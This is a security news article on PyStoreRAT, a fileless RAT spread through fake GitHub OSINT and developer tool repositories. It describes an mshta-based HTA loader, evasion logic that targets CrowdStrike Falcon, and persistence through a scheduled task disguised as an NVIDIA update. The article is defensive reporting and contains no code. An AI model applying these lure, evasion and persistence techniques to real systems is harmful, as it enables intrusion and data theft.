PyStoreRAT Uncovered: Fileless RAT Hides in Fake GitHub Repos to Launch Invisible Attacks on Developers

A sophisticated new threat is stalking the open-source community, turning the trust developers place in GitHub repositories into a weapon. Morphisec Threat Labs has uncovered PyStoreRAT, a previously undocumented Remote Access Trojan (RAT) that hides within seemingly innocent Python projects to launch invisible, fileless attacks on victim machines.

Active since mid-2025, the campaign specifically targets developers and OSINT (Open Source Intelligence) practitioners by luring them with polished, but fraudulent, software tools.

The attack vector is deviously simple. Threat actors have flooded GitHub with repositories masquerading as useful utilities, such as “Spyder OSINT,” “HacxGPT,” or “VulnWatchDog.” These repos often feature AI-generated graphics and professional documentation to appear legitimate. However, the functionality is a mirage.

“These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via mshta.exe”.

Once a user runs the included Python script—believing they are launching a tool—a hidden subprocess triggers the infection chain. “The primary purpose was not to deliver legitimate functionality, but to… entice users to execute the included Python or JavaScript loader stub”.

The payload, PyStoreRAT, is a masterclass in modern evasion. It operates as a fileless JavaScript implant executed via the Windows HTML Application (HTA) subsystem, leaving little trace on the disk. Despite its lightweight delivery, it packs a heavy punch.

“PyStoreRAT itself is a modular, multi-stage JS implant capable of executing a wide range of payload formats, including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules”.

This modularity allows attackers to tailor their operations dynamically, deploying everything from file encryption to advanced spyware. In recent attacks, researchers observed the RAT delivering the notorious Rhadamanthys information stealer to harvest sensitive data.

One of the most alarming features of PyStoreRAT is its “awareness” of its environment. The malware actively scans for security tools, with specific hardcoded logic designed to evade industry-leading detection.

The report notes that the malware “includes explicit evasion logic targeting CrowdStrike Falcon”. If the RAT detects processes related to CrowdStrike (such as csfalconservice) or other antivirus products like “ReasonLabs,” it alters its execution behavior—launching via a command wrapper to break the process tree and confuse behavioral monitoring.

To ensure it remains on the infected system after a reboot, PyStoreRAT employs a classic masquerade. It creates a Windows Scheduled Task designed to look like a routine driver update.

“The task is disguised as ‘NVIDIA App SelfUpdate_[GUID]’ and is configured to run every 10 minutes or upon login,” ensuring the malware maintains a persistent foothold on the device.

While attribution is ongoing, Morphisec analysts have found clues pointing East. “Russian-language artifacts and coding patterns point to a likely Eastern European origin,” the report states.

As developers continue to rely on open-source ecosystems, PyStoreRAT serves as a grim reminder to verify every line of code. The malware “represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” making it a potent threat in the modern landscape.

Related Posts:

• North Korean Hackers Exploit GitHub and Dropbox in Targeted Spearphishing Attacks
• Stealthy WordPress Malware Uncovered: SEO Spam Plugin Mimics Your Domain to Evade Detection
• GlassWorm Supply Chain Worm Uses Invisible Unicode and Solana Blockchain for Stealth C2
• Turla APT Group Unleashes Sophisticated Fileless Backdoor via Compromised Site